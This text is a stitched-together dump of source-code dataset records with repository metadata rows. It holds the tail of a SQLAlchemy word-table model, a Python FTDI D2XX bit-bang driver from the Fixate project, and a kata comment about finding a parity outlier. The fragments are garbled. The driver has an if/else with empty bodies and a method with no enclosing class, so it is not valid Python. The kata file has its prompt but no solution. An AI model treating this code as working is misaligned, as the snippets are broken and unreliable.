    word = Column("Word", String(64), nullable=False)
    # Precomputed sort keys for the two dictionary orderings.
    sort_a = Column("SortA", String(64), nullable=False)
    sort_b = Column("SortB", String(64), nullable=False)
    # Event ids bounding when this spelling applies (start/end).
    event_start_id = Column("SEVT", Integer, nullable=False)
    event_end_id = Column("EEVT", Integer, nullable=False)
    origin_x = Column("OriginX", String(64))
    id = Column(Integer, primary_key=True)
'''
class AccessXWord(Base, BaseFunctions):
"""XWord model"""
__tablename__ = "XWord"
sort_name = "XWord"
XSortA = Column(String)
XSortB = Column(String)
WID = Column(String, primary_key=True)
I = Column(String)
XWord = Column(String)
'''
| 28.627219 | 84 | 0.65895 |
49dbc6af92d52afcc0e8a89b6aa09a1a1c7354f4 | 16,726 | py | Python | src/fixate/drivers/ftdi.py | stig999/Fixate | 24b4a16736c80b28f40aeb52972c52f9654983ef | [
"MIT"
] | 1 | 2017-11-23T04:18:03.000Z | 2017-11-23T04:18:03.000Z | src/fixate/drivers/ftdi.py | stig999/Fixate | 24b4a16736c80b28f40aeb52972c52f9654983ef | [
"MIT"
] | 5 | 2018-08-24T11:13:29.000Z | 2018-08-29T00:40:36.000Z | src/fixate/drivers/ftdi.py | stig999/Fixate | 24b4a16736c80b28f40aeb52972c52f9654983ef | [
"MIT"
] | null | null | null | import ctypes
import struct
import time
from fixate.core.common import bits
from fixate.core.exceptions import InstrumentError, InstrumentNotConnected
import fixate.config
import fixate.core.discover
def open(ftdi_description=""):
"""Open is the public api for the bit bang driver for discovering and opening a connection
to a valid bit bang device
:param restrictions:
A dictionary containing the extents of the required equipment
:return:
A instantiated class connected to a valid bit_bang class
"""
devices = fixate.core.discover.discover_ftdi()
for dev in devices:
if ftdi_description.encode() == dev.Description or ftdi_description == "":
return FTDI2xx(dev.Description)
raise InstrumentNotConnected("No valid ftdi found by description '{}'".format(ftdi_description))
# Definitions
# ctypes aliases mirroring the Windows/D2XX type names used by FTD2XX.dll.
UCHAR = ctypes.c_ubyte
PCHAR = ctypes.POINTER(ctypes.c_char)
PUCHAR = ctypes.POINTER(ctypes.c_ubyte)
DWORD = ctypes.c_ulong
LPDWORD = ctypes.POINTER(ctypes.c_ulong)
FT_HANDLE = DWORD
# Add null padding if 64 bit
# NOTE(review): the bodies of this if/else appear to be missing from this
# excerpt -- the conditional selects a 64-bit vs 32-bit layout based on
# pointer size (struct.calcsize("P")).  Confirm against the full source.
if struct.calcsize("P") == 8:
else: # 32 bit
# Load the FTDI D2XX driver DLL (Windows-only: ctypes.WinDLL); the DLL is
# installed alongside the FTDI device driver.
try:
    ftdI2xx = ctypes.WinDLL("FTD2XX.dll")
except Exception as e:
    raise ImportError("Unable to find FTD2XX.dll.\nPlugging in FDTI device will install DLL.") from e
_ipdwNumDevs = DWORD(0)  # out-parameter storage for the enumerated device count
_p_ipdwNumDevs = LPDWORD(_ipdwNumDevs)
# FT_GetDeviceInfoList
def configure_bit_bang(self, bit_mode, bytes_required, latch_mask=1, clk_mask=2, data_mask=4, invert_mask=0b000):
    """Configure CBUS bit-bang operation for this device.

    :param bit_mode: bit-bang mode written to the device via write_bit_mode
    :param bytes_required: number of bytes to shift out per transfer
    :param latch_mask: CBUS pin mask for latch (default 1, Relay Matrix)
    :param clk_mask: CBUS pin mask for clock (default 2, Relay Matrix)
    :param data_mask: CBUS pin mask for data (default 4, Relay Matrix)
    :param invert_mask: inversion selector, MSB 0b<latch><clock><data> LSB;
        0b111 inverts all three lines, 0b000 inverts none
    :return: None
    """
    self.bb_bytes = bytes_required
    self.bit_mode = bit_mode
    self.write_bit_mode(self.pin_value_mask)
    self.bb_data = data_mask
    self.bb_clk = clk_mask
    self.bb_latch = latch_mask
    # Build the combined inversion mask: for each selected bit of
    # invert_mask (2=latch, 1=clock, 0=data), add that line's pin mask.
    inverted = 0
    for bit_position, pin_mask in ((2, latch_mask), (1, clk_mask), (0, data_mask)):
        if invert_mask & (1 << bit_position):
            inverted += pin_mask
    self.bb_inv_mask = inverted
49dc810a61e2972f79b20f3f39e3b0c03cad34a5 | 552 | py | Python | Data Structures/Python/find-the-parity-outier.py | KhushMody/Ds-Algo-HacktoberFest | 2cb5bdcfcdcb87b67ee31941cc9afc466507a05b | [
"MIT"
] | 12 | 2020-10-04T06:48:29.000Z | 2021-02-16T17:54:04.000Z | Data Structures/Python/find-the-parity-outier.py | KhushMody/Ds-Algo-HacktoberFest | 2cb5bdcfcdcb87b67ee31941cc9afc466507a05b | [
"MIT"
] | 14 | 2020-10-04T09:09:52.000Z | 2021-10-16T19:59:23.000Z | Data Structures/Python/find-the-parity-outier.py | KhushMody/Ds-Algo-HacktoberFest | 2cb5bdcfcdcb87b67ee31941cc9afc466507a05b | [
"MIT"
] | 55 | 2020-10-04T03:09:25.000Z | 2021-10-16T09:00:12.000Z | # You are given an array (which will have a length of at least 3, but could be very large) containing integers. The array is either entirely comprised of odd integers or entirely comprised of even integers except for a single integer N. Write a method that takes the array as an argument and returns this "outlier" N.
# Examples
# find_outlier([2, 4, 6, 7]) => 7
# find_outlier([3, 7, 11, 2]) => 2
| 61.333333 | 317 | 0.711957 |